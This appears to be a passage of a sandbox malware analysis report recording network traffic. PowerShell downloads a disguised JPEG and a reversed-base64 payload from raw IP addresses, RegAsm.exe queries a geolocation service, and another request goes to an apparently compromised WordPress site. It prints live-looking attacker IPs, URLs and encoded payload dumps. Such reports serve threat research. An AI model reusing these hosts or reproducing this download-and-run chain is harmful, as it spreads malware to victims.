                                                        Data Ascii: peration: "private const L_UNKOPT_ErrorMessage = "Unknown switch: "private const L_BLANKOPT_ErrorMessage = "Miss
                                                        Jul 26, 2024 15:10:46.938055038 CEST1236INData Raw: 6f 00 6e 00 65 00 20 00 6d 00 61 00 74 00 63 00 68 00 20 00 69 00 73 00 20 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 3a 00 20 00 22 00 0d 00 0a 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00
                                                        Data Ascii: one match is expected: "private const L_OPTNOTUNQ_Message = "Option is not unique: "private const L_URIMISSING_M


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.2249164198.46.176.133803076C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 26, 2024 15:10:50.955878019 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
                                                        Host: 198.46.176.133
                                                        Connection: Keep-Alive
                                                        Jul 26, 2024 15:10:51.459670067 CEST1236INHTTP/1.1 200 OK
                                                        Date: Fri, 26 Jul 2024 13:10:51 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                        Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                                                        ETag: "1d7285-61ce2d35c4b0c"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1929861
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: image/jpeg
                                                        Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
                                                        Jul 26, 2024 15:10:51.459692955 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                                                        Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
                                                        Jul 26, 2024 15:10:51.459711075 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                                                        Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                                                        Jul 26, 2024 15:10:51.459923983 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                                                        Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                                                        Jul 26, 2024 15:10:51.459942102 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                                                        Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
                                                        Jul 26, 2024 15:10:51.459960938 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                                                        Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
                                                        Jul 26, 2024 15:10:51.459980965 CEST1236INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                                                        Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
                                                        Jul 26, 2024 15:10:51.460634947 CEST1236INData Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
                                                        Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
                                                        Jul 26, 2024 15:10:51.460652113 CEST1236INData Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
                                                        Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
                                                        Jul 26, 2024 15:10:51.460670948 CEST1236INData Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
                                                        Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
                                                        Jul 26, 2024 15:10:51.464759111 CEST1236INData Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
                                                        Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.2249165104.168.45.34803076C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 26, 2024 15:10:53.425060987 CEST74OUTGET /59/LMTS.txt HTTP/1.1
                                                        Host: 104.168.45.34
                                                        Connection: Keep-Alive
                                                        Jul 26, 2024 15:10:53.907732964 CEST1236INHTTP/1.1 200 OK
                                                        Date: Fri, 26 Jul 2024 13:10:53 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                        Last-Modified: Fri, 26 Jul 2024 06:12:52 GMT
                                                        ETag: "a1000-61e2066c262fd"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 659456
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/plain
                                                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                                                        Jul 26, 2024 15:10:53.907753944 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                                        Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                                                        Jul 26, 2024 15:10:53.907762051 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                                                        Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                                                        Jul 26, 2024 15:10:53.907847881 CEST1236INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                                                        Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                                                        Jul 26, 2024 15:10:53.907861948 CEST1236INData Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44
                                                        Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
                                                        Jul 26, 2024 15:10:53.907876015 CEST1236INData Raw: 41 33 50 6d 39 44 58 2f 49 31 50 49 39 6a 50 2f 49 7a 50 6e 38 54 48 2f 4d 78 50 4a 34 7a 2f 2b 51 75 50 4a 37 6a 70 2b 4d 6f 50 6f 35 6a 58 2b 51 6c 50 4b 35 44 51 2b 59 6a 50 73 34 6a 49 2b 67 68 50 4f 34 44 42 39 6f 66 50 77 33 6a 35 39 77 64
                                                        Data Ascii: A3Pm9DX/I1PI9jP/IzPn8TH/MxPJ4z/+QuPJ7jp+MoPo5jX+QlPK5DQ+YjPs4jI+ghPO4DB9ofPw3j59wdPS3Dy94bP12jj9YYPv1zS98APRzDl8gFPJxjO8cwO/vzO7MzOroz464rOcqzd6gmOZlDl4Y0Neejg24vNhPTFz8gM7LT3yssMGHzZxMTMCAD/wUJAAAAtAUAcAAAA/o6Pb+zj/83Pi9jW/AjPp7Ty+0rPx6Tn+EpP
                                                        Jul 26, 2024 15:10:53.907891035 CEST776INData Raw: 33 44 6d 39 41 55 50 77 30 6a 4a 39 6b 52 50 50 30 44 41 38 59 4f 50 66 7a 44 32 38 45 4e 50 65 79 54 69 38 51 49 50 7a 78 54 61 38 73 45 50 76 77 54 48 38 73 77 4f 38 76 6a 67 36 6b 6e 4f 53 6c 7a 35 35 41 63 4f 62 59 6a 55 32 4d 54 4e 46 58 6a
                                                        Data Ascii: 3Dm9AUPw0jJ9kRPP0DA8YOPfzD28ENPeyTi8QIPzxTa8sEPvwTH8swO8vjg6knOSlz55AcObYjU2MTNFXja1kAN9QDM0gyM7LTxyIoMhJTWyEkMtEDYxEDMBDjdw4GAAAAbAQA4A8j8/s+Pr+DT/8hPc7T0+gsPk6jf+YnPX4zD98dPO3TI8QLPUyTZ80FPFxTO7I/OevDp7AkO1rD76MuONrTw6MqObqDk6coOxpzW6AiOVoDD
                                                        Jul 26, 2024 15:10:53.907907009 CEST1236INData Raw: 38 54 4c 2f 45 52 50 30 33 6a 76 39 4d 52 50 44 77 54 71 38 59 49 50 51 78 6a 50 38 63 77 4f 4d 76 54 73 37 45 34 4f 49 70 7a 30 36 55 73 4f 41 72 7a 73 36 30 70 4f 48 71 44 67 36 38 56 4f 76 64 7a 63 32 4d 71 4e 45 61 6a 59 31 51 66 4e 53 58 6a
                                                        Data Ascii: 8TL/ERP03jv9MRPDwTq8YIPQxjP8cwOMvTs7E4OIpz06UsOArzs60pOHqDg68VOvdzc2MqNEajY1QfNSXjw10aNjWjA00ONkTz10wMN2Rjb0kENBRzE0wwM7PT8zc+MgPT0zs8MEPTuy0jMyEj0xoXM0FjbxsVMNFTRx4SMkETGxMRMOAT6wAOM8CDtwUHMtBDLwECAAAAnAQAkAAAA/48PI/TY/k1PL9zQ/ozPx8TK/EyPZ8jD
                                                        Jul 26, 2024 15:10:53.908207893 CEST1236INData Raw: 63 34 50 44 35 54 78 2b 34 71 50 59 30 6a 7a 39 59 62 50 6e 31 44 58 39 4d 41 50 69 7a 7a 4f 37 6f 2b 4f 57 76 7a 79 37 41 38 4f 37 75 54 73 37 77 36 4f 53 75 7a 64 37 6f 30 4f 79 6f 6a 2b 36 51 74 4f 33 71 54 67 36 63 6c 4f 34 67 6a 47 34 55 78
                                                        Data Ascii: c4PD5Tx+4qPY0jz9YbPn1DX9MAPizzO7o+OWvzy7A8O7uTs7w6OSuzd7o0Oyoj+6QtO3qTg6clO4gjG4UxNnfjx3E8NOezh3g2NedDW3kzNvUzO1ADN3Tj70MIN9Rzd00GNZQTBz8/MtPTrzI5MAOzbzY2McNDVzIkM6LT8y8tMYLjby0lMYJDTyckM0IDKyEiMKED9x4dMPHznxgWMSBjHAAAA0CABwAAAA8T7/I+PH/zo/c4P
                                                        Jul 26, 2024 15:10:53.908241987 CEST1236INData Raw: 64 6a 57 33 59 31 4e 53 64 6a 54 33 6f 30 4e 47 64 6a 51 33 34 7a 4e 36 63 6a 4e 33 49 7a 4e 75 63 6a 4b 33 59 79 4e 69 63 6a 48 33 6f 78 4e 57 63 6a 45 33 34 77 4e 4b 63 6a 42 33 49 67 4e 2b 62 6a 2b 32 59 76 4e 79 62 6a 37 32 6f 4f 41 41 41 41
                                                        Data Ascii: djW3Y1NSdjT3o0NGdjQ34zN6cjN3IzNucjK3YyNicjH3oxNWcjE34wNKcjB3IgN+bj+2YvNybj72oOAAAApAMAgAAAA0IOAAAADAMAcA8DU+gtPFzDL8gCPkwDI8sxOWvDg7w3O4tDd782OotTM5MYO1lzV5QkNsaDq2QqNgazm2YlNAUD/1gfN0Xz71geNxSzAzU/MXPDxzcgMELjvy4qMFKDXyYjMUIjDyAQM7HT9x8eMpHD5
                                                        Jul 26, 2024 15:10:53.912780046 CEST1236INData Raw: 45 61 4e 31 52 54 31 30 38 4d 4e 75 53 54 71 30 38 4a 4e 55 53 6a 69 30 41 49 4e 36 52 44 64 30 34 47 4e 6f 52 6a 56 30 77 45 4e 45 52 54 4f 30 4d 44 4e 74 51 6a 46 30 34 77 4d 52 50 54 79 7a 73 37 4d 78 4f 6a 6f 7a 63 35 4d 53 4f 44 6a 7a 55 34
                                                        Data Ascii: EaN1RT108MNuSTq08JNUSji0AIN6RDd04GNoRjV0wENERTO0MDNtQjF04wMRPTyzs7MxOjozc5MSODjzU4MyNjVz00MINTOz0yMaMjEy4vM1LD8ycuMiLz2ywsMGLTuxMeMZHzzxUcM7GTtAAQAkAwAABgPL2D59kEPoyTF7IoOvrjX4MHOhhzS4QxN2fz23c7Ngezg3sHAAAALAMAMA4z7+otPF7TbzU6MWBAAAQBADACAyAoM


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.2249169178.237.33.50803220C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jul 26, 2024 15:11:05.093271017 CEST71OUTGET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
                                                        Jul 26, 2024 15:11:05.730648994 CEST1170INHTTP/1.1 200 OK
                                                        date: Fri, 26 Jul 2024 13:11:05 GMT
                                                        server: Apache
                                                        content-length: 962
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.224917193.113.54.564433604C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-26 13:11:15 UTC189OUTGET /os/transportment.pfm HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: asociatiatraditiimaria.ro
                                                        Connection: Keep-Alive
                                                        2024-07-26 13:11:16 UTC518INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                        transfer-encoding: chunked
                                                        date: Fri, 26 Jul 2024 13:11:16 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-07-26 13:11:16 UTC850INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                        Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociaia Tradiii
